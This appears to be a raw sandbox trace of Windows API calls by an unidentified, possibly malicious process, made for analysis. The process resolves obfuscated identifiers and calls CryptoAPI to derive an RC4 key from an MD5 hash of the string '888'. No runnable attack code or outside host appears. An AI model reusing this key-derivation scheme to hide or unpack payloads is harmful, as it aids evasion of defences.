1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.735] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.735] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.735] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0214.735] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.735] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0214.736] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0214.736] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.736] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.736] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0214.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0214.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.736] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.736] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0214.736] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.736] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0214.736] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0214.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0214.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0214.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0214.737] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c440) returned 1 [0214.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.738] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.738] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.738] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0214.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.738] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0214.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.739] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.739] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.739] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.739] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.739] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.739] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.739] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.739] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.739] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.739] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.739] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.740] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.740] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.740] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.740] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.740] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.740] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.740] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.740] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab6c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0214.740] CryptCreateHash (in: hProv=0xa7c440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0214.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.740] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.741] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0214.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ca8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.741] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.741] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.741] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.741] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.741] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.741] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab470, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0214.741] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71c68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0214.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.741] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.741] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.741] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.741] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.741] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.742] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.742] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.742] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.742] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.742] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0214.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab518, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0214.742] CryptDeriveKey (in: hProv=0xa7c440, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0214.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.742] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.742] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0214.742] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.742] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0214.742] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 